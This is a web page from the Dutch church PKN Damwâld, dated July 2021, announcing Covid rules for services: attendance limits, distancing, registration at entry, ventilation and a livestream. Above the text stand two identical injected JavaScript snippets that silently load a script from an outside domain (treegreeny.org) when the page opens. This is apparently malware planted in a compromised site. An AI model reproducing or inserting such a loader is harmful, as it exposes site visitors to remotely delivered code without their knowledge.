;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Onze samenkomsten ... welkom in de kerk! - PKN Damwâld

Onze samenkomsten … welkom in de kerk!

Gepubliceerd op: vrijdag 16 juli 2021

Het is geweldig dat we de afgelopen week de aanwezigheid van 100 gemeenteleden in de ochtenddienst gepasseerd zijn. Heel fijn om weer met elkaar in Gods Huis te zijn. Nu is het zo dat we nog niet met meer dan 100 personen mogen samenkomen in de kerk, omdat we de 1,5 meter afstand nog in acht moeten nemen. Aangezien de besmettingsaantallen weer wat toenemen en het nu nog onduidelijk is hoe dit zich gaat ontwikkelen, zal het waarschijnlijk zo zijn dat wij voor zondag 22 augustus weer moeten gaan werken met registratie vooraf, omdat dan de vakantieperiode voorbij is en de Bernetsjerke/ King Kids weer gaat opstarten.  Het gezamenlijke moderamen is druk bezig om uit te zoeken hoe wij  dit zo praktisch mogelijk gaan vormgeven. Houdt u hiervoor de Klok en Us Tsjerkenijs in de gaten die op 19/20 augustus uitkomen.

U bent dan ook van harte uitgenodigd om de ochtenddienst weer bij te wonen. Opgave is zoals gezegd voorlopig tot 22 augustus NIET nodig. Wij vragen u wel om bij binnenkomst uw naam en telefoonnummer te noteren en uw handen te ontsmetten. Mondkapjes zijn niet meer nodig en er mag weer gezongen worden. Het blijft wel belangrijk om de 1,5 meter afstand te bewaren. De toiletten mogen ook weer gebruikt worden. Heeft u klachten of bent u in contact geweest met iemand die corona klachten heeft, blijf dan thuis. Daarnaast kunt u de dienst natuurlijk ook via de live stream volgen.

Vanwege het toegenomen risico van Covid19 besmettingen is ventilatie in de kerkzaal belangrijk. Daarom zullen zowel de buiten als binnendeuren van de kerkzaal tijdens de dienst open staan. Wilt u de hinder van tocht voorkomen, kies dan een plaats waar u van de tocht geen last hebt.